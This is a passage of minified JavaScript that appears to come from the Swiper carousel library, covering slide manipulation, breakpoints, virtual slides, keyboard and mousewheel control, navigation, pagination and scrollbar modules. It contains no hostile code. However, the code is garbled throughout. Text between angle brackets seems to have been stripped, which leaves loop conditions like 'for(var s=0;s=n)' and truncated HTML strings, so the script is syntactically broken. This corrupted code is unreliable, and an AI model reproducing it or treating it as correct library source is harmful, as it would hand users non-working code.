e=this,t=e.$wrapperEl,a=e.params,i=e.slides;t.children("."+a.slideClass+"."+a.slideDuplicateClass+",."+a.slideClass+"."+a.slideBlankClass).remove(),i.removeAttr("data-swiper-slide-index")}},grabCursor:{setGrabCursor:function(e){var t=this;if(!(t.support.touch||!t.params.simulateTouch||t.params.watchOverflow&&t.isLocked||t.params.cssMode)){var a=t.el;a.style.cursor="move",a.style.cursor=e?"-webkit-grabbing":"-webkit-grab",a.style.cursor=e?"-moz-grabbin":"-moz-grab",a.style.cursor=e?"grabbing":"grab"}},unsetGrabCursor:function(){var e=this;e.support.touch||e.params.watchOverflow&&e.isLocked||e.params.cssMode||(e.el.style.cursor="")}},manipulation:{appendSlide:function(e){var t=this,a=t.$wrapperEl,i=t.params;if(i.loop&&t.loopDestroy(),"object"==typeof e&&"length"in e)for(var s=0;s=n)a.appendSlide(t);else{for(var o=r>e?r+1:r,l=[],d=n-1;d>=e;d-=1){var p=a.slides.eq(d);p.remove(),l.unshift(p)}if("object"==typeof t&&"length"in t){for(var c=0;ce?r+t.length:r}else i.append(t);for(var u=0;u1,u=p.slidesPerColumn>1;c&&!u?(n.removeClass(r.containerModifierClass+"multirow "+r.containerModifierClass+"multirow-column"),e.emitContainerClasses()):!c&&u&&(n.addClass(r.containerModifierClass+"multirow"),"column"===p.slidesPerColumnFill&&n.addClass(r.containerModifierClass+"multirow-column"),e.emitContainerClasses());var h=p.direction&&p.direction!==r.direction,v=r.loop&&(p.slidesPerView!==r.slidesPerView||h);h&&a&&e.changeDirection(),C(e.params,p),C(e,{allowTouchMove:e.params.allowTouchMove,allowSlideNext:e.params.allowSlideNext,allowSlidePrev:e.params.allowSlidePrev}),e.currentBreakpoint=l,e.emit("_beforeBreakpoint",p),v&&a&&(e.loopDestroy(),e.loopCreate(),e.updateSlides(),e.slideTo(t-s+e.loopedSlides,0,!1)),e.emit("breakpoint",p)}}},getBreakpoint:function(e,t,a){if(void 0===t&&(t="window"),e&&("container"!==t||a)){var i=!1,s=o(),r="window"===t?s.innerWidth:a.clientWidth,n="window"===t?s.innerHeight:a.clientHeight,l=Object.keys(e).map((function(e){if("string"==typeof e&&0===e.indexOf("@")){var t=parseFloat(e.substr(1));return{value:n*t,point:e}}return{value:e,point:e}}));l.sort((function(e,t){return parseInt(e.value,10)-parseInt(t.value,10)}));for(var d=0;d0&&t.slidesOffsetBefore+t.spaceBetween*(e.slides.length-1)+e.slides[0].offsetWidth*e.slides.length;t.slidesOffsetBefore&&t.slidesOffsetAfter&&i?e.isLocked=i<=e.size:e.isLocked=1===e.snapGrid.length,e.allowSlideNext=!e.isLocked,e.allowSlidePrev=!e.isLocked,a!==e.isLocked&&e.emit(e.isLocked?"lock":"unlock"),a&&a!==e.isLocked&&(e.isEnd=!1,e.navigation&&e.navigation.update())}},classes:{addClasses:function(){var e,t,a,i=this,s=i.classNames,r=i.params,n=i.rtl,o=i.$el,l=i.device,d=i.support,p=(e=["initialized",r.direction,{"pointer-events":d.pointerEvents&&!d.touch},{"free-mode":r.freeMode},{autoheight:r.autoHeight},{rtl:n},{multirow:r.slidesPerColumn>1},{"multirow-column":r.slidesPerColumn>1&&"column"===r.slidesPerColumnFill},{android:l.android},{ios:l.ios},{"css-mode":r.cssMode}],t=r.containerModifierClass,a=[],e.forEach((function(e){"object"==typeof e?Object.keys(e).forEach((function(i){e[i]&&a.push(t+i)})):"string"==typeof e&&a.push(t+e)})),a);s.push.apply(s,p),o.addClass([].concat(s).join(" ")),i.emitContainerClasses()},removeClasses:function(){var e=this,t=e.$el,a=e.classNames;t.removeClass(a.join(" ")),e.emitContainerClasses()}},images:{loadImage:function(e,t,a,i,s,r){var n,l=o();function d(){r&&r()}m(e).parent("picture")[0]||e.complete&&s?d():t?((n=new l.Image).onload=d,n.onerror=d,i&&(n.sizes=i),a&&(n.srcset=a),t&&(n.src=t)):d()},preloadImages:function(){var e=this;function t(){null!=e&&e&&!e.destroyed&&(void 0!==e.imagesLoaded&&(e.imagesLoaded+=1),e.imagesLoaded===e.imagesToLoad.length&&(e.params.updateOnImagesReady&&e.update(),e.emit("imagesReady")))}e.imagesToLoad=e.$el.find("img");for(var a=0;a1){var n=[];return m(a.el).each((function(e){var i=C({},a,{el:e});n.push(new t(i))})),n}var o=this;o.__swiper__=!0,o.support=P(),o.device=k({userAgent:a.userAgent}),o.browser=L(),o.eventsListeners={},o.eventsAnyListeners=[],void 0===o.modules&&(o.modules={}),Object.keys(o.modules).forEach((function(e){var t=o.modules[e];if(t.params){var i=Object.keys(t.params)[0],s=t.params[i];if("object"!=typeof s||null===s)return;if(!(i in a)||!("enabled"in s))return;!0===a[i]&&(a[i]={enabled:!0}),"object"!=typeof a[i]||"enabled"in a[i]||(a[i].enabled=!0),a[i]||(a[i]={enabled:!1})}}));var l,d,p=C({},R);return o.useParams(p),o.params=C({},p,W,a),o.originalParams=C({},o.params),o.passedParams=C({},a),o.params&&o.params.on&&Object.keys(o.params.on).forEach((function(e){o.on(e,o.params.on[e])})),o.params&&o.params.onAny&&o.onAny(o.params.onAny),o.$=m,C(o,{el:e,classNames:[],slides:m(),slidesGrid:[],snapGrid:[],slidesSizesGrid:[],isHorizontal:function(){return"horizontal"===o.params.direction},isVertical:function(){return"vertical"===o.params.direction},activeIndex:0,realIndex:0,isBeginning:!0,isEnd:!1,translate:0,previousTranslate:0,progress:0,velocity:0,animating:!1,allowSlideNext:o.params.allowSlideNext,allowSlidePrev:o.params.allowSlidePrev,touchEvents:(l=["touchstart","touchmove","touchend","touchcancel"],d=["mousedown","mousemove","mouseup"],o.support.pointerEvents&&(d=["pointerdown","pointermove","pointerup"]),o.touchEventsTouch={start:l[0],move:l[1],end:l[2],cancel:l[3]},o.touchEventsDesktop={start:d[0],move:d[1],end:d[2]},o.support.touch||!o.params.simulateTouch?o.touchEventsTouch:o.touchEventsDesktop),touchEventsData:{isTouched:void 0,isMoved:void 0,allowTouchCallbacks:void 0,touchStartTime:void 0,isScrolling:void 0,currentTranslate:void 0,startTranslate:void 0,allowThresholdMove:void 0,formElements:"input, select, option, textarea, button, video, label",lastClickTime:x(),clickTimeout:void 0,velocities:[],allowMomentumBounce:void 0,isTouchEvent:void 0,startMoving:void 0},allowClick:!0,allowTouchMove:o.params.allowTouchMove,touches:{startX:0,startY:0,currentX:0,currentY:0,diff:0},imagesToLoad:[],imagesLoaded:0}),o.useModules(),o.emit("_swiper"),o.params.init&&o.init(),o}var a,i,s,r=t.prototype;return r.setProgress=function(e,t){var a=this;e=Math.min(Math.max(e,0),1);var i=a.minTranslate(),s=(a.maxTranslate()-i)*e+i;a.translateTo(s,void 0===t?0:t),a.updateActiveIndex(),a.updateSlidesClasses()},r.emitContainerClasses=function(){var e=this;if(e.params._emitClasses&&e.el){var t=e.el.className.split(" ").filter((function(t){return 0===t.indexOf("swiper-container")||0===t.indexOf(e.params.containerModifierClass)}));e.emit("_containerClasses",t.join(" "))}},r.getSlideClasses=function(e){var t=this;return e.className.split(" ").filter((function(e){return 0===e.indexOf("swiper-slide")||0===e.indexOf(t.params.slideClass)})).join(" ")},r.emitSlidesClasses=function(){var e=this;if(e.params._emitClasses&&e.el){var t=[];e.slides.each((function(a){var i=e.getSlideClasses(a);t.push({slideEl:a,classNames:i}),e.emit("_slideClass",a,i)})),e.emit("_slideClasses",t)}},r.slidesPerViewDynamic=function(){var e=this,t=e.params,a=e.slides,i=e.slidesGrid,s=e.size,r=e.activeIndex,n=1;if(t.centeredSlides){for(var o,l=a[r].swiperSlideSize,d=r+1;ds&&(o=!0));for(var p=r-1;p>=0;p-=1)a[p]&&!o&&(n+=1,(l+=a[p].swiperSlideSize)>s&&(o=!0))}else for(var c=r+1;c1)&&e.isEnd&&!e.params.centeredSlides?e.slideTo(e.slides.length-1,0,!1,!0):e.slideTo(e.activeIndex,0,!1,!0))||i(),a.watchOverflow&&t!==e.snapGrid&&e.checkOverflow(),e.emit("update")}function i(){var t=e.rtlTranslate?-1*e.translate:e.translate,a=Math.min(Math.max(t,e.maxTranslate()),e.minTranslate());e.setTranslate(a),e.updateActiveIndex(),e.updateSlidesClasses()}},r.changeDirection=function(e,t){void 0===t&&(t=!0);var a=this,i=a.params.direction;return e||(e="horizontal"===i?"vertical":"horizontal"),e===i||"horizontal"!==e&&"vertical"!==e||(a.$el.removeClass(""+a.params.containerModifierClass+i).addClass(""+a.params.containerModifierClass+e),a.emitContainerClasses(),a.params.direction=e,a.slides.each((function(t){"vertical"===e?t.style.width="":t.style.height=""})),a.emit("changeDirection"),t&&a.update()),a},r.mount=function(e){var t=this;if(t.mounted)return!0;var a,i=m(e||t.params.el);return!!(e=i[0])&&(e.swiper=t,e&&e.shadowRoot&&e.shadowRoot.querySelector?(a=m(e.shadowRoot.querySelector("."+t.params.wrapperClass))).children=function(e){return i.children(e)}:a=i.children("."+t.params.wrapperClass),C(t,{$el:i,el:e,$wrapperEl:a,wrapperEl:a[0],mounted:!0,rtl:"rtl"===e.dir.toLowerCase()||"rtl"===i.css("direction"),rtlTranslate:"horizontal"===t.params.direction&&("rtl"===e.dir.toLowerCase()||"rtl"===i.css("direction")),wrongRTL:"-webkit-box"===a.css("display")}),!0)},r.init=function(e){var t=this;return t.initialized||!1===t.mount(e)||(t.emit("beforeInit"),t.params.breakpoints&&t.setBreakpoint(),t.addClasses(),t.params.loop&&t.loopCreate(),t.updateSize(),t.updateSlides(),t.params.watchOverflow&&t.checkOverflow(),t.params.grabCursor&&t.setGrabCursor(),t.params.preloadImages&&t.preloadImages(),t.params.loop?t.slideTo(t.params.initialSlide+t.loopedSlides,0,t.params.runCallbacksOnInit):t.slideTo(t.params.initialSlide,0,t.params.runCallbacksOnInit),t.attachEvents(),t.initialized=!0,t.emit("init"),t.emit("afterInit")),t},r.destroy=function(e,t){void 0===e&&(e=!0),void 0===t&&(t=!0);var a,i=this,s=i.params,r=i.$el,n=i.$wrapperEl,o=i.slides;return void 0===i.params||i.destroyed||(i.emit("beforeDestroy"),i.initialized=!1,i.detachEvents(),s.loop&&i.loopDestroy(),t&&(i.removeClasses(),r.removeAttr("style"),n.removeAttr("style"),o&&o.length&&o.removeClass([s.slideVisibleClass,s.slideActiveClass,s.slideNextClass,s.slidePrevClass].join(" ")).removeAttr("style").removeAttr("data-swiper-slide-index")),i.emit("destroy"),Object.keys(i.eventsListeners).forEach((function(e){i.off(e)})),!1!==e&&(i.$el[0].swiper=null,a=i,Object.keys(a).forEach((function(e){try{a[e]=null}catch(e){}try{delete a[e]}catch(e){}}))),i.destroyed=!0),null},t.extendDefaults=function(e){C(W,e)},t.installModule=function(e){t.prototype.modules||(t.prototype.modules={});var a=e.name||Object.keys(t.prototype.modules).length+"_"+x();t.prototype.modules[a]=e},t.use=function(e){return Array.isArray(e)?(e.forEach((function(e){return t.installModule(e)})),t):(t.installModule(e),t)},a=t,s=[{key:"extendedDefaults",get:function(){return W}},{key:"defaults",get:function(){return R}}],(i=null)&&e(a.prototype,i),s&&e(a,s),t}();Object.keys(V).forEach((function(e){Object.keys(V[e]).forEach((function(t){F.prototype[t]=V[e][t]}))})),F.use([$,O]);var _={update:function(e){var t=this,a=t.params,i=a.slidesPerView,s=a.slidesPerGroup,r=a.centeredSlides,n=t.params.virtual,o=n.addSlidesBefore,l=n.addSlidesAfter,d=t.virtual,p=d.from,c=d.to,u=d.slides,h=d.slidesGrid,v=d.renderSlide,f=d.offset;t.updateActiveIndex();var m,g,b,w=t.activeIndex||0;m=t.rtlTranslate?"right":t.isHorizontal()?"left":"top",r?(g=Math.floor(i/2)+s+l,b=Math.floor(i/2)+s+o):(g=i+(s-1)+l,b=s+o);var y=Math.max((w||0)-b,0),E=Math.min((w||0)+g,u.length-1),x=(t.slidesGrid[y]||0)-(t.slidesGrid[0]||0);function T(){t.updateSlides(),t.updateProgress(),t.updateSlidesClasses(),t.lazy&&t.params.lazy.enabled&&t.lazy.load()}if(C(t.virtual,{from:y,to:E,offset:x,slidesGrid:t.slidesGrid}),p===y&&c===E&&!e)return t.slidesGrid!==h&&x!==f&&t.slides.css(m,x+"px"),void t.updateProgress();if(t.params.virtual.renderExternal)return t.params.virtual.renderExternal.call(t,{offset:x,from:y,to:E,slides:function(){for(var e=[],t=y;t<=E;t+=1)e.push(u[t]);return e}()}),void(t.params.virtual.renderExternalUpdate&&T());var S=[],M=[];if(e)t.$wrapperEl.find("."+t.params.slideClass).remove();else for(var z=p;z<=c;z+=1)(zE)&&t.$wrapperEl.find("."+t.params.slideClass+'[data-swiper-slide-index="'+z+'"]').remove();for(var P=0;P=y&&P<=E&&(void 0===c||e?M.push(P):(P>c&&M.push(P),P'+e+"
    ");return s.attr("data-swiper-slide-index")||s.attr("data-swiper-slide-index",t),i.cache&&(a.virtual.cache[t]=s),s},appendSlide:function(e){var t=this;if("object"==typeof e&&"length"in e)for(var a=0;a=0;i-=1)t.virtual.slides.splice(e[i],1),t.params.virtual.cache&&delete t.virtual.cache[e[i]],e[i]0&&0===t.$el.parents("."+t.params.slideActiveClass).length)return;var g=t.$el,b=g[0].clientWidth,w=g[0].clientHeight,y=a.innerWidth,E=a.innerHeight,x=t.$el.offset();s&&(x.left-=t.$el[0].scrollLeft);for(var T=[[x.left,x.top],[x.left+b,x.top],[x.left,x.top+w],[x.left+b,x.top+w]],S=0;S=0&&C[0]<=y&&C[1]>=0&&C[1]<=E){if(0===C[0]&&0===C[1])continue;m=!0}}if(!m)return}t.isHorizontal()?((p||c||u||h)&&(n.preventDefault?n.preventDefault():n.returnValue=!1),((c||h)&&!s||(p||u)&&s)&&t.slideNext(),((p||u)&&!s||(c||h)&&s)&&t.slidePrev()):((p||c||v||f)&&(n.preventDefault?n.preventDefault():n.returnValue=!1),(c||f)&&t.slideNext(),(p||v)&&t.slidePrev()),t.emit("keyPress",l)}},enable:function(){var e=this,t=r();e.keyboard.enabled||(m(t).on("keydown",e.keyboard.handle),e.keyboard.enabled=!0)},disable:function(){var e=this,t=r();e.keyboard.enabled&&(m(t).off("keydown",e.keyboard.handle),e.keyboard.enabled=!1)}},U={name:"keyboard",params:{keyboard:{enabled:!1,onlyInViewport:!0,pageUpDown:!0}},create:function(){M(this,{keyboard:t({enabled:!1},j)})},on:{init:function(e){e.params.keyboard.enabled&&e.keyboard.enable()},destroy:function(e){e.keyboard.enabled&&e.keyboard.disable()}}};var K={lastScrollTime:x(),lastEventBeforeSnap:void 0,recentWheelEvents:[],event:function(){return o().navigator.userAgent.indexOf("firefox")>-1?"DOMMouseScroll":function(){var e=r(),t="onwheel",a=t in e;if(!a){var i=e.createElement("div");i.setAttribute(t,"return;"),a="function"==typeof i.onwheel}return!a&&e.implementation&&e.implementation.hasFeature&&!0!==e.implementation.hasFeature("","")&&(a=e.implementation.hasFeature("Events.wheel","3.0")),a}()?"wheel":"mousewheel"},normalize:function(e){var t=0,a=0,i=0,s=0;return"detail"in e&&(a=e.detail),"wheelDelta"in e&&(a=-e.wheelDelta/120),"wheelDeltaY"in e&&(a=-e.wheelDeltaY/120),"wheelDeltaX"in e&&(t=-e.wheelDeltaX/120),"axis"in e&&e.axis===e.HORIZONTAL_AXIS&&(t=a,a=0),i=10*t,s=10*a,"deltaY"in e&&(s=e.deltaY),"deltaX"in e&&(i=e.deltaX),e.shiftKey&&!i&&(i=s,s=0),(i||s)&&e.deltaMode&&(1===e.deltaMode?(i*=40,s*=40):(i*=800,s*=800)),i&&!t&&(t=i<1?-1:1),s&&!a&&(a=s<1?-1:1),{spinX:t,spinY:a,pixelX:i,pixelY:s}},handleMouseEnter:function(){this.mouseEntered=!0},handleMouseLeave:function(){this.mouseEntered=!1},handle:function(e){var t=e,a=this,i=a.params.mousewheel;a.params.cssMode&&t.preventDefault();var s=a.$el;if("container"!==a.params.mousewheel.eventsTarget&&(s=m(a.params.mousewheel.eventsTarget)),!a.mouseEntered&&!s[0].contains(t.target)&&!i.releaseOnEdges)return!0;t.originalEvent&&(t=t.originalEvent);var r=0,n=a.rtlTranslate?-1:1,o=K.normalize(t);if(i.forceToAxis)if(a.isHorizontal()){if(!(Math.abs(o.pixelX)>Math.abs(o.pixelY)))return!0;r=-o.pixelX*n}else{if(!(Math.abs(o.pixelY)>Math.abs(o.pixelX)))return!0;r=-o.pixelY}else r=Math.abs(o.pixelX)>Math.abs(o.pixelY)?-o.pixelX*n:-o.pixelY;if(0===r)return!0;i.invert&&(r=-r);var l=a.getTranslate()+r*i.sensitivity;if(l>=a.minTranslate()&&(l=a.minTranslate()),l<=a.maxTranslate()&&(l=a.maxTranslate()),(!!a.params.loop||!(l===a.minTranslate()||l===a.maxTranslate()))&&a.params.nested&&t.stopPropagation(),a.params.freeMode){var d={time:x(),delta:Math.abs(r),direction:Math.sign(r)},p=a.mousewheel.lastEventBeforeSnap,c=p&&d.time=a.minTranslate()&&(u=a.minTranslate()),u<=a.maxTranslate()&&(u=a.maxTranslate()),a.setTransition(0),a.setTranslate(u),a.updateProgress(),a.updateActiveIndex(),a.updateSlidesClasses(),(!h&&a.isBeginning||!v&&a.isEnd)&&a.updateSlidesClasses(),a.params.freeModeSticky){clearTimeout(a.mousewheel.timeout),a.mousewheel.timeout=void 0;var f=a.mousewheel.recentWheelEvents;f.length>=15&&f.shift();var g=f.length?f[f.length-1]:void 0,b=f[0];if(f.push(d),g&&(d.delta>g.delta||d.direction!==g.direction))f.splice(0);else if(f.length>=15&&d.time-b.time<500&&b.delta-d.delta>=1&&d.delta<=6){var w=r>0?.8:.2;a.mousewheel.lastEventBeforeSnap=d,f.splice(0),a.mousewheel.timeout=E((function(){a.slideToClosest(a.params.speed,!0,void 0,w)}),0)}a.mousewheel.timeout||(a.mousewheel.timeout=E((function(){a.mousewheel.lastEventBeforeSnap=d,f.splice(0),a.slideToClosest(a.params.speed,!0,void 0,.5)}),500))}if(c||a.emit("scroll",t),a.params.autoplay&&a.params.autoplayDisableOnInteraction&&a.autoplay.stop(),u===a.minTranslate()||u===a.maxTranslate())return!0}}else{var y={time:x(),delta:Math.abs(r),direction:Math.sign(r),raw:e},T=a.mousewheel.recentWheelEvents;T.length>=2&&T.shift();var S=T.length?T[T.length-1]:void 0;if(T.push(y),S?(y.direction!==S.direction||y.delta>S.delta||y.time>S.time+150)&&a.mousewheel.animateSlider(y):a.mousewheel.animateSlider(y),a.mousewheel.releaseScroll(y))return!0}return t.preventDefault?t.preventDefault():t.returnValue=!1,!1},animateSlider:function(e){var t=this,a=o();return!(this.params.mousewheel.thresholdDelta&&e.delta=6&&x()-t.mousewheel.lastScrollTime<60||(e.direction<0?t.isEnd&&!t.params.loop||t.animating||(t.slideNext(),t.emit("scroll",e.raw)):t.isBeginning&&!t.params.loop||t.animating||(t.slidePrev(),t.emit("scroll",e.raw)),t.mousewheel.lastScrollTime=(new a.Date).getTime(),!1)))},releaseScroll:function(e){var t=this,a=t.params.mousewheel;if(e.direction<0){if(t.isEnd&&!t.params.loop&&a.releaseOnEdges)return!0}else if(t.isBeginning&&!t.params.loop&&a.releaseOnEdges)return!0;return!1},enable:function(){var e=this,t=K.event();if(e.params.cssMode)return e.wrapperEl.removeEventListener(t,e.mousewheel.handle),!0;if(!t)return!1;if(e.mousewheel.enabled)return!1;var a=e.$el;return"container"!==e.params.mousewheel.eventsTarget&&(a=m(e.params.mousewheel.eventsTarget)),a.on("mouseenter",e.mousewheel.handleMouseEnter),a.on("mouseleave",e.mousewheel.handleMouseLeave),a.on(t,e.mousewheel.handle),e.mousewheel.enabled=!0,!0},disable:function(){var e=this,t=K.event();if(e.params.cssMode)return e.wrapperEl.addEventListener(t,e.mousewheel.handle),!0;if(!t)return!1;if(!e.mousewheel.enabled)return!1;var a=e.$el;return"container"!==e.params.mousewheel.eventsTarget&&(a=m(e.params.mousewheel.eventsTarget)),a.off(t,e.mousewheel.handle),e.mousewheel.enabled=!1,!0}},Z={toggleEl:function(e,t){e[t?"addClass":"removeClass"](this.params.navigation.disabledClass),e[0]&&"BUTTON"===e[0].tagName&&(e[0].disabled=t)},update:function(){var e=this,t=e.params.navigation,a=e.navigation.toggleEl;if(!e.params.loop){var i=e.navigation,s=i.$nextEl,r=i.$prevEl;r&&r.length>0&&(e.isBeginning?a(r,!0):a(r,!1),r[e.params.watchOverflow&&e.isLocked?"addClass":"removeClass"](t.lockClass)),s&&s.length>0&&(e.isEnd?a(s,!0):a(s,!1),s[e.params.watchOverflow&&e.isLocked?"addClass":"removeClass"](t.lockClass))}},onPrevClick:function(e){var t=this;e.preventDefault(),t.isBeginning&&!t.params.loop||t.slidePrev()},onNextClick:function(e){var t=this;e.preventDefault(),t.isEnd&&!t.params.loop||t.slideNext()},init:function(){var e,t,a=this,i=a.params.navigation;(i.nextEl||i.prevEl)&&(i.nextEl&&(e=m(i.nextEl),a.params.uniqueNavElements&&"string"==typeof i.nextEl&&e.length>1&&1===a.$el.find(i.nextEl).length&&(e=a.$el.find(i.nextEl))),i.prevEl&&(t=m(i.prevEl),a.params.uniqueNavElements&&"string"==typeof i.prevEl&&t.length>1&&1===a.$el.find(i.prevEl).length&&(t=a.$el.find(i.prevEl))),e&&e.length>0&&e.on("click",a.navigation.onNextClick),t&&t.length>0&&t.on("click",a.navigation.onPrevClick),C(a.navigation,{$nextEl:e,nextEl:e&&e[0],$prevEl:t,prevEl:t&&t[0]}))},destroy:function(){var e=this,t=e.navigation,a=t.$nextEl,i=t.$prevEl;a&&a.length&&(a.off("click",e.navigation.onNextClick),a.removeClass(e.params.navigation.disabledClass)),i&&i.length&&(i.off("click",e.navigation.onPrevClick),i.removeClass(e.params.navigation.disabledClass))}},J={update:function(){var e=this,t=e.rtl,a=e.params.pagination;if(a.el&&e.pagination.el&&e.pagination.$el&&0!==e.pagination.$el.length){var i,s=e.virtual&&e.params.virtual.enabled?e.virtual.slides.length:e.slides.length,r=e.pagination.$el,n=e.params.loop?Math.ceil((s-2*e.loopedSlides)/e.params.slidesPerGroup):e.snapGrid.length;if(e.params.loop?((i=Math.ceil((e.activeIndex-e.loopedSlides)/e.params.slidesPerGroup))>s-1-2*e.loopedSlides&&(i-=s-2*e.loopedSlides),i>n-1&&(i-=n),i<0&&"bullets"!==e.params.paginationType&&(i=n+i)):i=void 0!==e.snapIndex?e.snapIndex:e.activeIndex||0,"bullets"===a.type&&e.pagination.bullets&&e.pagination.bullets.length>0){var o,l,d,p=e.pagination.bullets;if(a.dynamicBullets&&(e.pagination.bulletSize=p.eq(0)[e.isHorizontal()?"outerWidth":"outerHeight"](!0),r.css(e.isHorizontal()?"width":"height",e.pagination.bulletSize*(a.dynamicMainBullets+4)+"px"),a.dynamicMainBullets>1&&void 0!==e.previousIndex&&(e.pagination.dynamicBulletIndex+=i-e.previousIndex,e.pagination.dynamicBulletIndex>a.dynamicMainBullets-1?e.pagination.dynamicBulletIndex=a.dynamicMainBullets-1:e.pagination.dynamicBulletIndex<0&&(e.pagination.dynamicBulletIndex=0)),o=i-e.pagination.dynamicBulletIndex,d=((l=o+(Math.min(p.length,a.dynamicMainBullets)-1))+o)/2),p.removeClass(a.bulletActiveClass+" "+a.bulletActiveClass+"-next "+a.bulletActiveClass+"-next-next "+a.bulletActiveClass+"-prev "+a.bulletActiveClass+"-prev-prev "+a.bulletActiveClass+"-main"),r.length>1)p.each((function(e){var t=m(e),s=t.index();s===i&&t.addClass(a.bulletActiveClass),a.dynamicBullets&&(s>=o&&s<=l&&t.addClass(a.bulletActiveClass+"-main"),s===o&&t.prev().addClass(a.bulletActiveClass+"-prev").prev().addClass(a.bulletActiveClass+"-prev-prev"),s===l&&t.next().addClass(a.bulletActiveClass+"-next").next().addClass(a.bulletActiveClass+"-next-next"))}));else{var c=p.eq(i),u=c.index();if(c.addClass(a.bulletActiveClass),a.dynamicBullets){for(var h=p.eq(o),v=p.eq(l),f=o;f<=l;f+=1)p.eq(f).addClass(a.bulletActiveClass+"-main");if(e.params.loop)if(u>=p.length-a.dynamicMainBullets){for(var g=a.dynamicMainBullets;g>=0;g-=1)p.eq(p.length-g).addClass(a.bulletActiveClass+"-main");p.eq(p.length-a.dynamicMainBullets-1).addClass(a.bulletActiveClass+"-prev")}else h.prev().addClass(a.bulletActiveClass+"-prev").prev().addClass(a.bulletActiveClass+"-prev-prev"),v.next().addClass(a.bulletActiveClass+"-next").next().addClass(a.bulletActiveClass+"-next-next");else h.prev().addClass(a.bulletActiveClass+"-prev").prev().addClass(a.bulletActiveClass+"-prev-prev"),v.next().addClass(a.bulletActiveClass+"-next").next().addClass(a.bulletActiveClass+"-next-next")}}if(a.dynamicBullets){var b=Math.min(p.length,a.dynamicMainBullets+4),w=(e.pagination.bulletSize*b-e.pagination.bulletSize)/2-d*e.pagination.bulletSize,y=t?"right":"left";p.css(e.isHorizontal()?y:"top",w+"px")}}if("fraction"===a.type&&(r.find(z(a.currentClass)).text(a.formatFractionCurrent(i+1)),r.find(z(a.totalClass)).text(a.formatFractionTotal(n))),"progressbar"===a.type){var E;E=a.progressbarOpposite?e.isHorizontal()?"vertical":"horizontal":e.isHorizontal()?"horizontal":"vertical";var x=(i+1)/n,T=1,S=1;"horizontal"===E?T=x:S=x,r.find(z(a.progressbarFillClass)).transform("translate3d(0,0,0) scaleX("+T+") scaleY("+S+")").transition(e.params.speed)}"custom"===a.type&&a.renderCustom?(r.html(a.renderCustom(e,i+1,n)),e.emit("paginationRender",r[0])):e.emit("paginationUpdate",r[0]),r[e.params.watchOverflow&&e.isLocked?"addClass":"removeClass"](a.lockClass)}},render:function(){var e=this,t=e.params.pagination;if(t.el&&e.pagination.el&&e.pagination.$el&&0!==e.pagination.$el.length){var a=e.virtual&&e.params.virtual.enabled?e.virtual.slides.length:e.slides.length,i=e.pagination.$el,s="";if("bullets"===t.type){var r=e.params.loop?Math.ceil((a-2*e.loopedSlides)/e.params.slidesPerGroup):e.snapGrid.length;e.params.freeMode&&!e.params.loop&&r>a&&(r=a);for(var n=0;n";i.html(s),e.pagination.bullets=i.find(z(t.bulletClass))}"fraction"===t.type&&(s=t.renderFraction?t.renderFraction.call(e,t.currentClass,t.totalClass):' / ',i.html(s)),"progressbar"===t.type&&(s=t.renderProgressbar?t.renderProgressbar.call(e,t.progressbarFillClass):'',i.html(s)),"custom"!==t.type&&e.emit("paginationRender",e.pagination.$el[0])}},init:function(){var e=this,t=e.params.pagination;if(t.el){var a=m(t.el);0!==a.length&&(e.params.uniqueNavElements&&"string"==typeof t.el&&a.length>1&&(a=e.$el.find(t.el)),"bullets"===t.type&&t.clickable&&a.addClass(t.clickableClass),a.addClass(t.modifierClass+t.type),"bullets"===t.type&&t.dynamicBullets&&(a.addClass(""+t.modifierClass+t.type+"-dynamic"),e.pagination.dynamicBulletIndex=0,t.dynamicMainBullets<1&&(t.dynamicMainBullets=1)),"progressbar"===t.type&&t.progressbarOpposite&&a.addClass(t.progressbarOppositeClass),t.clickable&&a.on("click",z(t.bulletClass),(function(t){t.preventDefault();var a=m(this).index()*e.params.slidesPerGroup;e.params.loop&&(a+=e.loopedSlides),e.slideTo(a)})),C(e.pagination,{$el:a,el:a[0]}))}},destroy:function(){var e=this,t=e.params.pagination;if(t.el&&e.pagination.el&&e.pagination.$el&&0!==e.pagination.$el.length){var a=e.pagination.$el;a.removeClass(t.hiddenClass),a.removeClass(t.modifierClass+t.type),e.pagination.bullets&&e.pagination.bullets.removeClass(t.bulletActiveClass),t.clickable&&a.off("click",z(t.bulletClass))}}},Q={setTranslate:function(){var e=this;if(e.params.scrollbar.el&&e.scrollbar.el){var t=e.scrollbar,a=e.rtlTranslate,i=e.progress,s=t.dragSize,r=t.trackSize,n=t.$dragEl,o=t.$el,l=e.params.scrollbar,d=s,p=(r-s)*i;a?(p=-p)>0?(d=s-p,p=0):-p+s>r&&(d=r+p):p<0?(d=s+p,p=0):p+s>r&&(d=r-p),e.isHorizontal()?(n.transform("translate3d("+p+"px, 0, 0)"),n[0].style.width=d+"px"):(n.transform("translate3d(0px, "+p+"px, 0)"),n[0].style.height=d+"px"),l.hide&&(clearTimeout(e.scrollbar.timeout),o[0].style.opacity=1,e.scrollbar.timeout=setTimeout((function(){o[0].style.opacity=0,o.transition(400)}),1e3))}},setTransition:function(e){var t=this;t.params.scrollbar.el&&t.scrollbar.el&&t.scrollbar.$dragEl.transition(e)},updateSize:function(){var e=this;if(e.params.scrollbar.el&&e.scrollbar.el){var t=e.scrollbar,a=t.$dragEl,i=t.$el;a[0].style.width="",a[0].style.height="";var s,r=e.isHorizontal()?i[0].offsetWidth:i[0].offsetHeight,n=e.size/e.virtualSize,o=n*(r/e.size);s="auto"===e.params.scrollbar.dragSize?r*n:parseInt(e.params.scrollbar.dragSize,10),e.isHorizontal()?a[0].style.width=s+"px":a[0].style.height=s+"px",i[0].style.display=n>=1?"none":"",e.params.scrollbar.hide&&(i[0].style.opacity=0),C(t,{trackSize:r,divider:n,moveDivider:o,dragSize:s}),t.$el[e.params.watchOverflow&&e.isLocked?"addClass":"removeClass"](e.params.scrollbar.lockClass)}},getPointerPosition:function(e){return this.isHorizontal()?"touchstart"===e.type||"touchmove"===e.type?e.targetTouches[0].clientX:e.clientX:"touchstart"===e.type||"touchmove"===e.type?e.targetTouches[0].clientY:e.clientY},setDragPosition:function(e){var t,a=this,i=a.scrollbar,s=a.rtlTranslate,r=i.$el,n=i.dragSize,o=i.trackSize,l=i.dragStartPos;t=(i.getPointerPosition(e)-r.offset()[a.isHorizontal()?"left":"top"]-(null!==l?l:n/2))/(o-n),t=Math.max(Math.min(t,1),0),s&&(t=1-t);var d=a.minTranslate()+(a.maxTranslate()-a.minTranslate())*t;a.updateProgress(d),a.setTranslate(d),a.updateActiveIndex(),a.updateSlidesClasses()},onDragStart:function(e){var 